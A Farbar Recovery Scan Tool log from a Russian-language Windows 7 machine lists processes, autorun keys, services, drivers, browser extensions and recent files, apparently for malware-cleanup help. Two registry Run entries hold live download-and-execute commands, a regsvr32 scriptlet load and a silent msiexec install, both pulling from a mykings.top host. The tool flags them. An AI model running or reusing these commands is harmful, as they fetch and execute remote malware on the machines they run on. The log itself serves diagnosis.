Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24-09-2017
Ran by Администратор (administrator) on ADMIN-PC (25-09-2017 21:43:13)
Running from C:\Users\Администратор\Desktop
Loaded Profiles: Администратор (Available Profiles: Администратор)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Русский (Россия)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Scarlet.Crush Productions) C:\Users\Администратор\Desktop\ScpServer\bin\ScpService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
() C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Connect Firefox Software Updater\WCUService.exe
(Flux Software LLC) C:\Users\Администратор\AppData\Local\FluxSoftware\Flux\flux.exe
(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Connect IE Software Updater\WCUService.exe
(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Connect\ZyngaGamesAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
() C:\Windows\debug\lsmose.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Farbar) C:\Users\Администратор\Desktop\FRST64 (1).exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13370472 2011-11-18] (Realtek Semiconductor)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [STCAgent] => C:\Program Files (x86)\Splashtop\Splashtop Connect IE\STCAgent.exe [776064 2011-03-04] (Splashtop Inc.)
HKLM-x32\...\Run: [ZyngaGamesAgent] => C:\Program Files (x86)\Splashtop\Splashtop Connect\ZyngaGamesAgent.exe [841544 2010-11-15] (Splashtop Inc.)
HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [225944 2017-04-11] ()
HKLM\...\Policies\Explorer: [NoRecentDocsHistory] 1
HKLM\...\Policies\Explorer: [NoRemoteRecursiveEvents] 1
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3071776 2017-09-07] (Valve Corporation)
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Run: [Discord] => C:\Users\Администратор\AppData\Local\Discord\app-0.0.298\Discord.exe [57477112 2017-08-08] (Discord Inc.)
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Run: [f.lux] => C:\Users\Администратор\AppData\Local\FluxSoftware\Flux\flux.exe [1024240 2016-12-06] (Flux Software LLC)
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [NoResolveSearch] 1
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [NoInternetOpenWith] 1
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [NoCDBurning] 1
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\Policies\Explorer: [DisableThumbnailsOnNetworkFolders] 1
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\MountPoints2: {0fc6072d-64af-11e7-823a-806e6f6e6963} - D:\Run.exe
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\MountPoints2: {42c8b24a-67b5-11e7-acf2-902b3412db62} - E:\HiSuiteDownLoader.exe
HKU\S-1-5-21-2248936580-358153698-228202076-500\...\MountPoints2: {42c8b25c-67b5-11e7-acf2-902b3412db62} - E:\HiSuiteDownLoader.exe
BootExecute: hex(7):61,00,75,00,74,00,6f,00,63,00,68,00,65,00,63,00,6b,00,20,00,61,00,75,00,74,00,6f,00,63,00,68,00,6b,00,20,00,2f,00,6b,00,3a,00,43,00,20,00,2a,00,00,00,00,00

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b037a4da-4d56-43da-be16-466f04664fac} <==== ATTENTION (Restriction - IP)
Tcpip\Parameters: [DhcpNameServer] 212.75.210.62 212.75.211.2
Tcpip\..\Interfaces\{8D977268-7885-49EC-BD9A-863AA5CE7973}: [DhcpNameServer] 212.75.210.62 212.75.211.2

Internet Explorer:
==================
HKU\S-1-5-21-2248936580-358153698-228202076-500\Software\Microsoft\Internet Explorer\Main,Start Page = about:splashtopconnect
SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/yandsearch?clid=49585&text={searchTerms}
SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {004C3885-1641-4e0f-913D-2C6AEACBD935} URL = hxxp://ru.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=IEBDSV
SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/yandsearch?clid=49585&text={searchTerms}
SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {4D4C43BB-9BD5-455d-A93D-EE0C6AD7307F} URL = hxxp://www.google.com/cse?cx=partner-pub-3794288947762788%3A7941509802&ie=UTF-8&sa=Search&siteurl=www.google.com%2Fcse%2Fhome%3Fcx%3Dpartner-pub-3794288947762788%3A7941509802&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2248936580-358153698-228202076-500 -> {EA6E525E-5959-4c44-9481-6914E554F3F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=SPLBR1&pc=SPLH

FireFox:
========
FF HKLM-x32\...\Firefox\Extensions: [{91c612bf-2a7a-48b8-8c8c-6de28589b7a1}] - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a1}
FF Extension: (Splashtop Connect Companion) - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a1} [2017-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{91c612bf-2a7a-48b8-8c8c-6de28589b7a0}] - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a0}
FF Extension: (Splashtop Connect) - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{91c612bf-2a7a-48b8-8c8c-6de28589b7a0} [2017-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{d9284e50-81fc-11da-a72b-0800200c9a66}] - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{d9284e50-81fc-11da-a72b-0800200c9a66}
FF Extension: (Yoono) - C:\Program Files (x86)\Splashtop\Splashtop Connect for Firefox\{d9284e50-81fc-11da-a72b-0800200c9a66} [2017-07-09] [not signed]
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-07-09] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-07-09] (Google Inc.)

Chrome:
=======
CHR Profile: C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default [2017-09-25]
CHR Extension: (Google Презентации) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-07-09]
CHR Extension: (MusVK - Скачать музыку с Вконтакте) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\afkpfjljjhhonjehpkmgonimjjgaheap [2017-09-23]
CHR Extension: (Документы Google) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-07-09]
CHR Extension: (Диск Google) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-07-09]
CHR Extension: (YouTube) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-07-09]
CHR Extension: (Google Таблицы) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-07-09]
CHR Extension: (Google Документы офлайн) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-07-09]
CHR Extension: (AdBlock) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-09-23]
CHR Extension: (Steam Trader Helper) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhoahihokddepjlegpenefeaahdkojog [2017-07-27]
CHR Extension: (friGate CDN - бесперебойный доступ к сайтам) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbacbcfdfaapbcnlnbmciiaakomhkbkb [2017-09-04]
CHR Extension: (Платежная система Интернет-магазина Chrome) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Gmail) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-07-09]
CHR Extension: (Chrome Media Router) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-06] ()
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1533448 2017-09-14] ()
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [369720 2017-08-30] (BlueStack Systems, Inc.)
S3 defragsvc; C:\Windows\System32\defragsvc.dll [291328 2009-07-14] (Корпорация Майкрософт)
R2 Ds3Service; C:\Users\Администратор\Desktop\ScpServer\bin\ScpService.exe [381952 2014-03-13] (Scarlet.Crush Productions) [File not signed]
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [383016 2017-09-13] (EasyAntiCheat Ltd)
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [192200 2017-04-11] () [File not signed]
R2 WCUService_STC_FF; C:\Program Files (x86)\Splashtop\Splashtop Connect Firefox Software Updater\WCUService.exe [493384 2010-11-30] (Splashtop Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-03-14] (Microsoft Corporation)
S3 WPCSvc; C:\Windows\System32\wpcsvc.dll [12288 2009-07-14] (Корпорация Майкрософт)
S3 WPCSvc; C:\Windows\SysWOW64\wpcsvc.dll [10752 2009-07-14] (Корпорация Майкрософт)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [21616 2011-11-02] ()
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-06-21] (Bluestack System Inc. )
S3 ew_usbccgpfilter; C:\Windows\System32\DRIVERS\ew_usbccgpfilter.sys [18944 2017-04-11] (Huawei Technologies Co., Ltd.)
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2017-04-11] (Huawei Technologies Co., Ltd.)
R0 mountmgr; C:\Windows\System32\drivers\mountmgr.sys [94592 2010-11-21] (Корпорация Майкрософт)
S3 PortTalk; C:\Windows\SysWOW64\Drivers\PortTalk.sys [3567 2017-07-09] (Beyond Logic hxxp://www.beyondlogic.org) [File not signed]
R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
R0 volmgrx; C:\Windows\System32\drivers\volmgrx.sys [363392 2010-11-21] (Корпорация Майкрософт)
S3 gdrv; \??\C:\Windows\gdrv.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-09-25 21:43 - 2017-09-25 21:43 - 000013820 _____ C:\Users\Администратор\Desktop\FRST.txt
2017-09-25 21:42 - 2017-09-25 21:43 - 000000000 ____D C:\FRST
2017-09-25 21:30 - 2017-09-25 21:30 - 002399744 _____ (Farbar) C:\Users\Администратор\Desktop\FRST64 (1).exe
2017-09-25 20:16 - 2017-09-25 20:16 - 000003502 _____ C:\Windows\System32\Tasks\Mysa3
2017-09-25 20:16 - 2017-09-25 20:16 - 000003422 _____ C:\Windows\System32\Tasks\Mysa2
2017-09-25 20:16 - 2017-09-25 20:16 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1
2017-09-25 20:16 - 2017-09-25 20:16 - 000003186 _____ C:\Windows\System32\Tasks\ok
2017-09-25 20:15 - 2017-09-25 21:37 - 000000000 ____D C:\AdwCleaner
2017-09-25 13:43 - 2017-09-25 13:44 - 000000000 ____D C:\Users\Администратор\Desktop\AutoLogger
2017-09-22 22:28 - 2017-09-22 22:28 - 000000000 ____D C:\Users\Администратор\Documents\Larian Studios
2017-09-22 22:25 - 2017-09-22 22:25 - 000000904 _____ C:\Users\Администратор\Desktop\Divinity - Original Sin 2.lnk
2017-09-22 22:25 - 2017-09-22 22:25 - 000000765 _____ C:\Users\Администратор\Desktop\Смена языка Divinity - Original Sin 2.lnk
2017-09-16 16:05 - 2017-09-16 17:23 - 000000000 ____D C:\Users\Администратор\AppData\Local\Ubisoft Game Launcher
2017-09-16 16:05 - 2017-09-16 16:05 - 000001219 _____ C:\Users\Администратор\Desktop\Uplay.lnk
2017-09-16 16:05 - 2017-09-16 16:05 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-09-16 16:05 - 2017-09-16 16:05 - 000000000 ____D C:\Program Files (x86)\Ubisoft
2017-09-16 13:05 - 2017-09-16 13:05 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\EasyAntiCheat
2017-09-14 21:29 - 2017-09-14 21:29 - 000000000 ____D C:\Users\Администратор\AppData\Local\CrashReportClient
2017-09-13 21:15 - 2017-09-13 21:15 - 000000000 ____D C:\Users\Администратор\AppData\Local\DeadByDaylight
2017-09-13 21:15 - 2017-09-13 17:46 - 000383016 _____ (EasyAntiCheat Ltd) C:\Windows\SysWOW64\EasyAntiCheat.exe
2017-09-13 17:31 - 2017-09-13 17:31 - 000000222 _____ C:\Users\Администратор\Desktop\Dead by Daylight.url
2017-09-12 20:04 - 2017-09-12 20:04 - 000000000 ____D C:\Users\Администратор\AppData\Local\Absolver
2017-09-06 22:18 - 2017-09-06 22:18 - 000000000 ____D C:\Users\Администратор\AppData\Local\TekkenGame
2017-09-06 22:01 - 2017-09-22 22:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by.xatab
2017-09-06 22:01 - 2017-09-06 22:01 - 000000678 _____ C:\Users\Администратор\Desktop\Tekken 7.lnk
2017-09-04 23:32 - 2017-09-21 21:40 - 000000000 ____D C:\Users\Все пользователи\BlueStacksSetup
2017-09-04 23:32 - 2017-09-21 21:40 - 000000000 ____D C:\ProgramData\BlueStacksSetup
2017-09-04 23:32 - 2017-09-04 23:32 - 000000659 _____ C:\Users\Public\Desktop\BlueStacks.lnk
2017-09-04 23:32 - 2017-09-04 23:32 - 000000659 _____ C:\ProgramData\Microsoft\Windows\Start Menu\BlueStacks.lnk
2017-09-04 23:31 - 2017-09-04 23:32 - 000000000 ____D C:\Program Files (x86)\BlueStacks
2017-09-04 23:30 - 2017-09-04 23:32 - 000000000 ____D C:\Users\Администратор\AppData\Local\Bluestacks
2017-08-31 02:46 - 2017-08-31 02:46 - 000000000 ____D C:\Splashtop

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-09-25 21:39 - 2009-07-14 10:20 - 000000000 ____D C:\Windows\Help
2017-09-25 21:38 - 2017-07-27 12:07 - 000000077 _____ C:\Windows\system32\ps
2017-09-25 21:38 - 2017-07-27 12:07 - 000000075 _____ C:\Windows\system32\p
2017-09-25 21:38 - 2009-07-14 12:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2017-09-25 21:37 - 2017-07-09 17:28 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2017-09-25 21:14 - 2017-07-21 20:56 - 000000404 _____ C:\Windows\Tasks\update-sys.job
2017-09-25 20:17 - 2017-07-21 20:56 - 000000404 _____ C:\Windows\Tasks\update-S-1-5-21-2248936580-358153698-228202076-500.job
2017-09-25 16:50 - 2009-07-14 11:45 - 000016848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-09-25 16:50 - 2009-07-14 11:45 - 000016848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-09-25 12:39 - 2017-07-27 12:07 - 000000060 _____ C:\Windows\system32\s
2017-09-22 22:25 - 2017-07-11 17:14 - 000000000 ____D C:\Windows\SysWOW64\directx
2017-09-22 21:51 - 2017-07-10 19:32 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\BitTorrent
2017-09-16 16:07 - 2017-07-10 23:49 - 000000000 ____D C:\Users\Администратор\Documents\My Games
2017-09-14 14:23 - 2009-07-14 12:08 - 000032550 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-09-12 20:04 - 2017-07-10 15:19 - 000000000 ____D C:\Users\Администратор\AppData\Local\UnrealEngine
2017-09-12 12:29 - 2017-07-11 16:05 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\discord
2017-09-02 16:28 - 2017-08-20 21:19 - 000000000 ____D C:\Users\Администратор\Desktop\SpyHunter 4.21.10.4585 Portable by wood
2017-08-31 14:26 - 2011-04-12 20:26 - 000723936 _____ C:\Windows\system32\perfh019.dat
2017-08-31 14:26 - 2011-04-12 20:26 - 000150252 _____ C:\Windows\system32\perfc019.dat
2017-08-31 14:26 - 2009-07-14 12:13 - 001647438 _____ C:\Windows\system32\PerfStringBackup.INI
2017-08-31 14:26 - 2009-07-14 10:20 - 000000000 ____D C:\Windows\inf
2017-08-29 10:13 - 2017-07-09 17:25 - 000002203 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-29 10:13 - 2017-07-09 17:25 - 000002191 _____ C:\Users\Public\Desktop\Google Chrome.lnk

==================== Files in the root of some directories =======

2017-07-21 20:56 - 2017-07-21 20:56 - 000000003 _____ () C:\Users\Администратор\AppData\Local\updater.log
2017-07-21 20:56 - 2017-07-21 20:56 - 000000425 _____ () C:\Users\Администратор\AppData\Local\UserProducts.xml
2017-07-10 16:26 - 2017-08-01 02:59 - 000000060 _____ () C:\ProgramData\SoftwareUpdateTemp.xml

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll [2010-11-21 10:24] - [2017-07-10 19:47] - 001008640 _____ (Microsoft Corporation) 2C353B6CE0C8D03225CAA2AF33B68D79
C:\Windows\SysWOW64\User32.dll [2010-11-21 10:24] - [2017-07-10 19:47] - 000833024 _____ (Microsoft Corporation) 861C4346F9281DC0380DE72C8D55D6BE
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-09-24 10:50

==================== End of FRST.txt ============================